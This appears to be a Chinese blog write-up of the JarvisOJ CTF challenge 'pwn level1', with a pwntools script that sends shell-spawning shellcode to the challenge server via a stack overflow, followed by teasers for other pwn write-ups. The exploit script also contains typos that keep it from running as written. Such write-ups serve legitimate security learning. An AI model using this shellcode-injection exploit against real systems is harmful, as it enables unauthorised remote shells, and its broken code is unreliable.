jarvisoj pwn level1

原創

2019-08-02 03:53

https://www.jarvisoj.com/challenges

拿到程序後先file可知爲32位和動態鏈接

file level1

然後checksec檢查保護機制

checksec level1

拖入ida查看，在vulnerable_function()函數的printf()處存在注入點

棧結構：

低地址→高地址

buf→ebp→eip(返回地址)

思路：沒有system函數，在buf插入一段shellcode，將返回地址覆蓋爲shellcode的地址

level1.py如下：

from pwn import *
io=remote('pwn2.jarvisoj.com',9877)
shellcode=asm(shellcraft.sh())
p=io.recvline()
shell_add=int(p[14,-2],16)
payload=shellcode+'a'*(0x88+0x4=len(shellcode))+p32(shell_add)

io.send(payload)
io.interactive()
io.close()

執行level1.py

python level1.py
ls
cat flag

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

linux pwn練習0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul

2020-07-07 13:34:36

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址在大多數情況下，遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣，但是大致處於一個範圍內，並且，在同一個系統裏，這個差值是固定的，其差值的變化往往在偏移的第1.5

haivk

2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先，檢查一下程序的保護機制然後，我們用IDA分析一下，edit裏存在溢出，可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1，然後malloc(負數)

haivk

2020-07-05 02:32:56

iz_heap_lv1

iz_heap_lv1 首先，檢查一下程序的保護機制然後，我們用IDA分析一下，delete功能裏存在數組下標越界，可以free掉第21個堆指針，而第21個位置對應name的空間因此，我們可以在name裏僞造一個chunk，fr

haivk

2020-07-05 02:32:56

free_spirit（在棧上爆破一個可以被free的fake_chunk）

free_spirit（在棧上爆破一個可以被free的fake_chunk）首先檢查一下程序的保護機制然後，我們用IDA分析一下，功能3存在8字節溢出，將會把v7下面的buf指針覆蓋掉，而覆蓋了buf指針，就能實現任意地址寫。

haivk

2020-07-05 02:32:56

HITCON-Training lab5（自己構造rop）

看到靜態鏈接，一頓欣喜，直接ropchain生成，棧溢出找出來就ok啦？然後後來發現並沒有那麼簡單。。。 =================================================================

言承Yolanda

2020-07-08 01:37:40

HITCON-Training lab7（一道簡單的格式化字符串讀漏洞）

格式化字符串知道他的操作，可是做的一點也不熟練吧，，，BJDCTF上的r2t4不會啊，，，看不懂，，，所以就來補補格式化字符串的題目了，，，，看到canary開啓了，我還以爲要泄漏canary呢，結果發現不用那麼麻煩，，，其實

言承Yolanda

2020-07-08 01:37:40

HITCON-Training lab8（格式化字符串寫漏洞）

還在補格式化字符串漏洞的知識，，，，看到這道題的時候，有點懵，，，因爲發現218不會整，，，看官方writeup也不太行，，，先知社區上有篇講的就很好了，，，nice，用了四種方法（最後一種沒看懂，，，），，，看完，BJDCTF那道

言承Yolanda

2020-07-08 01:37:40

BJDCTF 2nd - Pwn（r2t3、one_gadget、r2t4）

r2t3 最簡單的一道題，可是我竟然沒有做出來，無語了，，，文件保護沒啥好說的，，，很正常進入name_check函數 255 ==> 255 256 ==> 0，257 ==> 1，258 ==> 2，259 ==> 3， 2

言承Yolanda

2020-07-08 01:37:40

棧遷移學習（buuctf [Black Watch 入羣題]）

i春秋的borrowstack是棧遷移和萬能gadget的混合，，，然後writeup看的不是很明白，也沒有很細的解析，所以，emmm，應該是自己棧遷移學的不是很好，只是知道大概的意思，但是還沒有做過題，這次在看雪看到文章，就好好學一下，

言承Yolanda

2020-07-08 01:37:40

BUUCTF刷題（前12道）

哈哈哈，我又來刷題了，看了下BUUCTF上面的pwn題還真多。。。 test_your_nc ida查看，發現直接執行system，所以，直接交互就可以 //寫下簡單的腳本 from pwn import * p = remote('

言承Yolanda

2020-07-08 01:37:40

逆向入門筆記之分析TraceMe.exe

TraceMe.exe是一個示例程序，用於逆向的學習，簡單地模擬了註冊機制。我們把它拖進IDA中無腦F5一波：雙擊DialogFunc進入這個函數： BOOL __stdcall DialogFunc(HWND hWnd, UIN

KogRow

2020-07-07 15:59:23

linux pwn練習0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul

2020-07-07 13:34:36

DASCTF&BJDCTF 3rd 三道PWN題復現

最近看了一下上次安恆五月賽沒做出的幾道PWN題，感覺自己水平還是不夠，還要多學習 easybabystack（格式化字符串*， ret2csu）這題有個棧溢出漏洞但是必須輸入正確的密碼，否則就直接退出了還有個格式化字符串

L.o.W

2020-07-04 09:32:10

Ubuntu_16.04 從0開始配置pwn環境

基礎軟件安裝大佬@giantbranch 配置的虛擬機，如果覺得自己用搭建環境比較麻煩，可以在他的github中直接下載虛擬機(提取碼: kypa)，個人感覺是非常適合新手入門時使用的一套工具，也可以從github上獲取腳本

阿鲁卡Alluka

2020-07-02 23:02:40

24小時熱門文章

jarvisoj pwn level1

vue項目獲取富文本編輯器wangEditor內容導出爲word（html轉word格式並下載）

dotnet C# 創建 X11 應用時設置窗口背景顏色

Navicat安裝與激活教程

TDengine docker安裝方法

vue3組件通信與props

sapui5

Alpine Linux apk add DNS lookup error

部分JDK版本的發佈時間

工作中用到的腳本合集

合併代碼時Beyond Compare設置

ubuntu18.4輸入ifconfig後沒有出現ip地址

jarvisoj pwn level1

jarvisoj pwn level0

kali Linux的postgresql使用

jarvisoj pwn tell me something

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結